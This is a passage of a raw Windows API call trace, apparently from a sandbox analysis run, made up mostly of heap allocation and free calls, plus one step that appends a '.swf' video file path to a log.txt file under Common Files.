hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0193.328] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.328] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.328] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0193.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0193.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.329] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.329] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.329] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.329] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0193.329] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0193.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0193.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0193.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0193.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.330] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0193.330] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x35ce, lpOverlapped=0x0) returned 1 [0193.330] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0193.330] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x35ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.330] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0193.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0193.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0193.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0193.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa548 [0193.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\n", cchWideChar=71, lpMultiByteStr=0x9aa548, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 71 [0193.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0193.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0193.331] WriteFile (in: hFile=0x158, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0193.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0193.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0193.331] CloseHandle (hObject=0x158) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0193.332] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0193.332] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0193.334] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0193.334] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.334] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0193.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0193.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0193.334] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0193.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0193.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0193.335] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0193.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0193.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0193.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0193.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0193.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0193.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.338] HeapFree 